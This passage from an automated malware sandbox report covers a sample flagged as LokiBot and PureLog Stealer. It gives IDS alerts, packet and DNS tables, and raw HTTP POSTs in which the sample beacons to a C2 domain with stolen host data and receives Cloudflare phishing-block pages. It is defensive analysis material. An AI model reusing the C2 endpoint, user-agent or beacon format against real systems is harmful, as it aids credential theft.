                              RT_MANIFEST0x310c80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                              Imports

                              DLLImport
                              mscoree.dll_CorExeMain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-12-05T17:08:48.612484+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.649707172.67.153.6380TCP
                              2024-12-05T17:08:48.612484+01002025381ET MALWARE LokiBot Checkin1192.168.2.649707172.67.153.6380TCP
                              2024-12-05T17:08:48.612484+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.649707172.67.153.6380TCP
                              2024-12-05T17:08:49.559564+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.649707172.67.153.6380TCP
                              2024-12-05T17:08:49.951076+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.649708172.67.153.6380TCP
                              2024-12-05T17:08:49.951076+01002025381ET MALWARE LokiBot Checkin1192.168.2.649708172.67.153.6380TCP
                              2024-12-05T17:08:49.951076+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.649708172.67.153.6380TCP
                              2024-12-05T17:08:50.948383+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.649708172.67.153.6380TCP
                              2024-12-05T17:08:51.642512+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.649710172.67.153.6380TCP
                              2024-12-05T17:08:51.642512+01002025381ET MALWARE LokiBot Checkin1192.168.2.649710172.67.153.6380TCP
                              2024-12-05T17:08:51.642512+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.649710172.67.153.6380TCP
                              2024-12-05T17:08:52.636477+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.649710172.67.153.6380TCP
                              2024-12-05T17:08:52.636477+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.649710172.67.153.6380TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:08:48.338478088 CET4970780192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:48.458786011 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:48.458956957 CET4970780192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:48.492671967 CET4970780192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:48.612423897 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:48.612483978 CET4970780192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:48.737193108 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.559437037 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.559463978 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.559474945 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.559485912 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.559499025 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.559564114 CET4970780192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:49.559621096 CET4970780192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:49.559701920 CET4970780192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:49.559864998 CET8049707172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.559911013 CET4970780192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:49.707811117 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:49.827773094 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.827872992 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:49.830173969 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:49.950922012 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:49.951076031 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:50.070925951 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:50.948086023 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:50.948291063 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:50.948303938 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:50.948313951 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:50.948328972 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:50.948359013 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:50.948383093 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:50.948414087 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:50.948414087 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:50.949445009 CET8049708172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:50.949480057 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:50.949480057 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:50.949491978 CET4970880192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.400041103 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.519943953 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:51.520034075 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.522492886 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.642457008 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:51.642512083 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:51.762314081 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636341095 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636395931 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636409044 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636440039 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636451960 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.636476994 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.636507034 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.636595011 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.637334108 CET8049710172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.640974998 CET4971080192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.777381897 CET4971180192.168.2.6172.67.153.63
                              Dec 5, 2024 17:08:52.902117968 CET8049711172.67.153.63192.168.2.6
                              Dec 5, 2024 17:08:52.902193069 CET4971180192.168.2.6172.67.153.63

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Dec 5, 2024 17:08:47.831559896 CET5557953192.168.2.61.1.1.1
                              Dec 5, 2024 17:08:48.239825010 CET53555791.1.1.1192.168.2.6

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Dec 5, 2024 17:08:47.831559896 CET192.168.2.61.1.1.10xb0f6Standard query (0)dddotx.shopA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Dec 5, 2024 17:08:48.239825010 CET1.1.1.1192.168.2.60xb0f6No error (0)dddotx.shop172.67.153.63A (IP address)IN (0x0001)false
                              Dec 5, 2024 17:08:48.239825010 CET1.1.1.1192.168.2.60xb0f6No error (0)dddotx.shop104.21.12.202A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • dddotx.shop

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.649707172.67.153.63805748C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              TimestampBytes transferredDirectionData
                              Dec 5, 2024 17:08:48.492671967 CET240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: dddotx.shop
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 925F43C2
                              Content-Length: 188
                              Connection: close
                              Dec 5, 2024 17:08:48.612483978 CET188OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                              Data Ascii: 'ckav.ruengineer936905ENGINEER-PCk0FDD42EE188E931437F4FBE2CdEgPD
                              Dec 5, 2024 17:08:49.559437037 CET1236INHTTP/1.1 403 Forbidden
                              Date: Thu, 05 Dec 2024 16:08:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DC1Le%2BDiy2G%2FblVMQtNZTQZxkNLrvBkMzyrk8Lv0Hsn3oMUxWrZ4Fcu%2BnDXcVeRiDamqR%2F4%2FmiIDaL4ITK2m3nzrzAmdcLxkAJgDMm4sqsdbTQZLSnmy5ZYx6tKXtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ed54c0cac7c42de-EWR
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
                              Dec 5, 2024 17:08:49.559463978 CET1236INData Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20
                              Data Ascii: s/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled
                              Dec 5, 2024 17:08:49.559474945 CET1236INData Raw: 20 20 20 20 20 20 20 3c 70 3e 50 68 69 73 68 69 6e 67 20 69 73 20 77 68 65 6e 20 61 20 73 69 74 65 20 61 74 74 65 6d 70 74 73 20 74 6f 20 73 74 65 61 6c 20 73 65 6e 73 69 74 69 76 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 66 61 6c 73 65
                              Data Ascii: <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p>
                              Dec 5, 2024 17:08:49.559485912 CET1236INData Raw: 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f
                              Data Ascii: -300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ed54c0cac7c42de</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-foo
                              Dec 5, 2024 17:08:49.559499025 CET145INData Raw: 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20
                              Data Ascii: </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.649708172.67.153.63805748C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              TimestampBytes transferredDirectionData
                              Dec 5, 2024 17:08:49.830173969 CET240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: dddotx.shop
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 925F43C2
                              Content-Length: 188
                              Connection: close
                              Dec 5, 2024 17:08:49.951076031 CET188OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                              Data Ascii: 'ckav.ruengineer936905ENGINEER-PC+0FDD42EE188E931437F4FBE2CiRSl9
                              Dec 5, 2024 17:08:50.948086023 CET1236INHTTP/1.1 403 Forbidden
                              Date: Thu, 05 Dec 2024 16:08:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E8KByjwPVRDzckWfwhsqzcyp8CStwlgUPhMUsP1S3SlyviMFU9tQIcsNRTL%2FS4L9%2B0ejmFMtsEWeuY%2BX3iLhq4qrQOQt3A0bgWRp8JG%2FK3lSw2oLkl5O%2B4VJ%2F6saMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ed54c15486c19bf-EWR
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/sty
                              Dec 5, 2024 17:08:50.948291063 CET224INData Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73
                              Data Ascii: les/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!na
                              Dec 5, 2024 17:08:50.948303938 CET1236INData Raw: 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20
                              Data Ascii: vigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) }</script>...<![endif]--></head><body>
                              Dec 5, 2024 17:08:50.948313951 CET224INData Raw: 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e
                              Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a>
                              Dec 5, 2024 17:08:50.948328972 CET1236INData Raw: 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63
                              Data Ascii: <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="M.xhfZTuO3PYE1QCnPWodopC3jrpyhA0QyF2ukfcA50-1733414930-0.0.1.1-/Mine/PWS/fre.php
                              Dec 5, 2024 17:08:50.948359013 CET935INData Raw: 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72
                              Data Ascii: ="hidden" id="cf-footer-ip">8.46.123.228</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferre


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.649710172.67.153.63805748C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              TimestampBytes transferredDirectionData
                              Dec 5, 2024 17:08:51.522492886 CET240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: dddotx.shop
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 925F43C2
                              Content-Length: 161
                              Connection: close
                              Dec 5, 2024 17:08:51.642512083 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                              Data Ascii: (ckav.ruengineer936905ENGINEER-PC0FDD42EE188E931437F4FBE2C
                              Dec 5, 2024 17:08:52.636341095 CET1236INHTTP/1.1 403 Forbidden
                              Date: Thu, 05 Dec 2024 16:08:52 GMT
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXDuLr5yd7B6aJd%2BuLl5EwxNocMfvrsLYims54n29GsBiRzWxc57q5vMQwBjVHFP8jUmxGjuN3aExQLh%2BDMyjKIEyWoaaLe4nXcgSPWgJTFtHZOyufmUwCYBKXkrzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ed54c1fd95541e6-EWR
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.e
                              Dec 5, 2024 17:08:52.636395931 CET1236INData Raw: 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22
                              Data Ascii: rrors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) {
                              Dec 5, 2024 17:08:52.636409044 CET1236INData Raw: 20 3c 70 3e 50 68 69 73 68 69 6e 67 20 69 73 20 77 68 65 6e 20 61 20 73 69 74 65 20 61 74 74 65 6d 70 74 73 20 74 6f 20 73 74 65 61 6c 20 73 65 6e 73 69 74 69 76 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 62 79 20 66 61 6c 73 65 6c 79 20 70 72 65
                              Data Ascii: <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p>
                              Dec 5, 2024 17:08:52.636440039 CET1236INData Raw: 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72
                              Data Ascii: <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ed54c1fd95541e6</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-it
                              Dec 5, 2024 17:08:52.636451960 CET139INData Raw: 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f
                              Data Ascii: /div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:11:08:45
                              Start date:05/12/2024
                              Path:C:\Users\user\Desktop\6SQADa3zKv.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\6SQADa3zKv.exe"
                              Imagebase:0x410000
                              File size:187'904 bytes
                              MD5 hash:D1D899B06642500D72ACAEB42896B348
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2119213083.0000000000412000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
